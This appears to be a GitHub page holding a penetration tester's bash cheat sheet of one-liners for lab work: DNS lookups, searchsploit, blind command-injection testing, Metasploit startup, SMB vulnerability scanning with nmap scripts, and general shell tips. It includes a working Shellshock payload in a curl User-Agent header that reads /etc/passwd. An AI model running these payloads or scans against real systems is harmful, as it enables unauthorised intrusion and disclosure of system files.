-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathbash
40 lines (26 loc) · 1.08 KB
/
bash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
nslookup file list
for i in $( cat targets );do nslookup $i;done
searchsploit SOMETHING
shellshock
curl -H "user-agent:() {:;};echo; /bin/bash -c 'cat /etc/passwd'"
to copy into working directory
searchsploit -m EXPLOIT
Test blind command injection
on target box
ping IP
on kali box
tcpdump -i tun0
Msfdb run - start db and run msfconsole
You can use this: $(!!) to recompute (not re-use) the output of the last command.
Example: cp `!!` .
when ifconfig is not available, use ip addr, or sbin/ifconfig
Recursive grep search for version number used to identify which files show version number
awk sorting by field : and printing first result
grep -R version_number . | awk -F: '{print $1}' | uniq
less filename
Can create multiple subsequent directories
mkdir -p one/two
Script to check every SMB vulnerability
for vul in $(find / -name smb*vuln*.nse | cut -d"/" -f 6); do nmap -v -p 139,445 --script=$vul -iL smb_server_all.txt -oN smb_vulns_$vul.txt; done
Always use full path to execute something
SNIFF SMB version ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]' & smbclient -L [IP]